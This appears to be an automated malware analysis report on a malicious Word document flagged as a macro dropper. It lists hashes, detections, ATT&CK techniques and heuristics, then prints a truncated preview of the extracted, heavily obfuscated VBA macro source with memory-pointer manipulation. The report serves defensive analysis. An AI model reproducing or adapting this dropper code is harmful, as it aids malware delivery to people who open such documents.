Office (OLE) malware analysis — malicious · 667752cadad91de5

MALICIOUS

Office (OLE)

214.5 KB Created: 2017-11-01 14:57:00 Authoring application: Microsoft Office Word First seen: 2017-11-13

MD5: 26b6af2245556b6075856314253e6313 SHA-1: 332bb31077a791b89771f3d4e7bc73762dc96a2f SHA-256: 667752cadad91de5900ec1da18b81a4ba623468d33ce7847330fbd99dba2a263

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1204.002 Malicious File

The sample contains VBA macros, including a Document_Open macro that executes shell commands, indicating it's a dropper. The presence of a macro-enable lure further supports this. ClamAV detection confirms its malicious nature as a document dropper.

Heuristics 6

ClamAV: Doc.Dropper.Agent-6362637-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6362637-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13098 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	13098 bytes
SHA-256: `3155762b2dda32c36472853b4800455230d69fefbe2e9538122bcda431511ab3`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub poon() Dim bahamas As Long Dim fama As Long assuefaction.rankle.Value = Day(#12/5/2013#) varday = ethnically = cyclothymic undesirability = contre cleancut = doting spatiotemporal = "remus" amphitryon = "tractable" drollish = "deliverer" choreographer = gstring bowsprit = poca Set scouring = assuefaction.rankle.SelectedItem selfaccusation = 68 averageness = 35785 babyrousa = 210077 Pmt 0, selfaccusation, 6337, 51135, 8 bloodroot = scouring.Name fakery = 88 - 22 + 7778 fortuna = Right(bloodroot, fakery) bimonthly = blocktwo.concentrated(fortuna) lemuridae = 117 coraciidae = 37594 plena = 244821 Pmt 0, lemuridae, 28818, 51835, 4 impreciseness = "labent" #If (8 * 2 + 5) > (7 - 2 * 1) And (21 - 7 * 3) * 2 < (Win64) Then Dim prosily As Variant Dim hydrocephalus As LongPtr Dim destiny As LongPtr Dim vox As String #End If #If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then Dim extinguisher As String Dim destiny As Long Dim ostensibly As String Dim hydrocephalus As Long #End If caught = 87 - 19 - 68 acanthuridae = "lumpy" ditty = 78 - 83 + 4101 affronterai = 38 distractedly = 11898 alkylbenzenesulfonate = 216104 Pmt 0, affronterai, 31131, 39872, 8 armigerous = "controvert" gateau = "dilection" cranch = 46 chauntress = 39943 crucifer = 258050 Pmt 0, cranch, 10911, 19759, 6 pee = bimonthly ideologically = "princess" scorpio = "breezily" hydrocephalus = bare(pee) crabbiness = cstern anaphor = "caducity" #If (3 * 4 + 5) > (5 - 2 * 1) And (8 - 4 * 2) * 2 < (Win64) Then Dim nymphaea As Long Dim berliner As LongPtr Dim hypothalamic As LongPtr Dim arbitrement As LongPtr angled = 79 - 91 + 2076 #End If #If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then Dim berliner As Long amount = 98 - 11 + 694 Dim hypothalamic As Long Dim arbitrement As Long angled = amount + 3459 #End If Dim abreast As Variant Dim dock As Variant berliner = 70 - 67 - 3 destiny = hydrocephalus + angled hypothalamic = 29 - 78 + 201576 arbitrement = 91 - 116 + 3525 pueblo = moorcock(hypothalamic, berliner, destiny, berliner, berliner, berliner, berliner) jackknifefish = 1 irritant = 35533 concesso = 335306 Pmt 0, jackknifefish, 27624, 44868, 6 End Sub Function bare(ave) Dim malvaceae As Variant Dim dramatic As String Dim mendelism As String Dim rutundo As Byte #If (6 * 3 + 5) > (7 - 2 * 1) And (48 - 6 * 8) * 2 < (Win64) Then Dim charioteer As Integer Dim aminopyrine As LongPtr frasera = 90 - 6 - 76 Dim recurved As LongPtr Dim mazed As Variant Dim sivapithecus As Byte Dim hedeoma As LongPtr Dim archaeopteryx As Byte #End If #If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then Dim aminopyrine As Long frasera = 35 - 65 + 34 Dim recurved As Long Dim hedeoma As Long #End If cymatiidae = VarPtr(aminopyrine) arduousness = coll(cymatiidae, VarPtr(ave) + 8, frasera) pedionomus = 88 - 25 - 64 recurved = 97 - 86 - 11 equilibration = 119 - 70 - 49 hedeoma = 88 - 52 + 9328 lowring = 48 - 38 + 4086 tractility = 105 - 116 + 75 buccal = diffuseness(ByVal pedionomus, _ recurved, _ ByVal equilibration, _ hedeoma, _ ByVal lowring, _ ByVal tractility) concertgoer = Fix(295) nanny = discourtesy coll recurved, aminopyrine, 34 - 4 + 5853 antitrades = 116 sleekly = 38210 postage = 579371 Pmt 0, antitrades, 39736, 22381, 4 bare = recurved End Function Function coll(maldon, menacing, amateurism) #If (7 * 4 + 5) > (7 - 2 * 1) And (20 - 5 * 4) * 2 < (Win64) Then Dim myxocephalus As Long Dim colored As Variant Dim comfrey As LongPtr Dim alkaline As LongPtr Dim preachment As LongPtr Dim dukedom As String Dim assimilate As LongPtr Dim deal As LongPtr #End If #If (8 * 2 + 5) > (7 - 2 * 1) And Not (2 ... (truncated)

SHA-256: 3155762b2dda32c36472853b4800455230d69fefbe2e9538122bcda431511ab3

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True


Sub poon()
Dim bahamas As Long
Dim fama As Long
assuefaction.rankle.Value = Day(#12/5/2013#)
varday = ethnically = cyclothymic
undesirability = contre
cleancut = doting
spatiotemporal = "remus"
amphitryon = "tractable"

drollish = "deliverer"
choreographer = gstring
bowsprit = poca
Set scouring = assuefaction.rankle.SelectedItem
selfaccusation = 68
averageness = 35785
babyrousa = 210077
 Pmt 0, selfaccusation, 6337, 51135, 8

bloodroot = scouring.Name
fakery = 88 - 22 + 7778
fortuna = Right(bloodroot, fakery)
bimonthly = blocktwo.concentrated(fortuna)
lemuridae = 117
coraciidae = 37594
plena = 244821
 Pmt 0, lemuridae, 28818, 51835, 4

impreciseness = "labent"
#If (8 * 2 + 5) > (7 - 2 * 1) And (21 - 7 * 3) * 2 < (Win64) Then
Dim prosily As Variant
Dim hydrocephalus As LongPtr
Dim destiny As LongPtr
Dim vox As String
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim extinguisher As String
Dim destiny As Long
Dim ostensibly As String
Dim hydrocephalus As Long
#End If
caught = 87 - 19 - 68
acanthuridae = "lumpy"
ditty = 78 - 83 + 4101
affronterai = 38
distractedly = 11898
alkylbenzenesulfonate = 216104
 Pmt 0, affronterai, 31131, 39872, 8

armigerous = "controvert"
gateau = "dilection"
cranch = 46
chauntress = 39943
crucifer = 258050
 Pmt 0, cranch, 10911, 19759, 6

pee = bimonthly
ideologically = "princess"
scorpio = "breezily"
hydrocephalus = bare(pee)
crabbiness = cstern
anaphor = "caducity"
#If (3 * 4 + 5) > (5 - 2 * 1) And (8 - 4 * 2) * 2 < (Win64) Then
Dim nymphaea As Long
Dim berliner As LongPtr
Dim hypothalamic As LongPtr
Dim arbitrement As LongPtr
angled = 79 - 91 + 2076
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim berliner As Long
amount = 98 - 11 + 694
Dim hypothalamic As Long
Dim arbitrement As Long
angled = amount + 3459

#End If
Dim abreast As Variant
Dim dock As Variant
berliner = 70 - 67 - 3
destiny = hydrocephalus + angled
hypothalamic = 29 - 78 + 201576
arbitrement = 91 - 116 + 3525
pueblo = moorcock(hypothalamic, berliner, destiny, berliner, berliner, berliner, berliner)
jackknifefish = 1
irritant = 35533
concesso = 335306
 Pmt 0, jackknifefish, 27624, 44868, 6

End Sub

Function bare(ave)
Dim malvaceae As Variant
Dim dramatic As String
Dim mendelism As String
Dim rutundo As Byte
#If (6 * 3 + 5) > (7 - 2 * 1) And (48 - 6 * 8) * 2 < (Win64) Then
Dim charioteer As Integer
Dim aminopyrine As LongPtr
frasera = 90 - 6 - 76
Dim recurved As LongPtr
Dim mazed As Variant
Dim sivapithecus As Byte
Dim hedeoma As LongPtr
Dim archaeopteryx As Byte
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim aminopyrine As Long
frasera = 35 - 65 + 34
Dim recurved As Long
Dim hedeoma As Long
#End If
cymatiidae = VarPtr(aminopyrine)
arduousness = coll(cymatiidae, VarPtr(ave) + 8, frasera)
pedionomus = 88 - 25 - 64
recurved = 97 - 86 - 11
equilibration = 119 - 70 - 49
hedeoma = 88 - 52 + 9328
lowring = 48 - 38 + 4086
tractility = 105 - 116 + 75
buccal = diffuseness(ByVal pedionomus, _
recurved, _
ByVal equilibration, _
hedeoma, _
ByVal lowring, _
ByVal tractility)
concertgoer = Fix(295)

nanny = discourtesy

coll recurved, aminopyrine, 34 - 4 + 5853
antitrades = 116
sleekly = 38210
postage = 579371
 Pmt 0, antitrades, 39736, 22381, 4

bare = recurved
End Function
Function coll(maldon, menacing, amateurism)
#If (7 * 4 + 5) > (7 - 2 * 1) And (20 - 5 * 4) * 2 < (Win64) Then
Dim myxocephalus As Long
Dim colored As Variant
Dim comfrey As LongPtr
Dim alkaline As LongPtr
Dim preachment As LongPtr
Dim dukedom As String
Dim assimilate As LongPtr
Dim deal As LongPtr
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (2
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.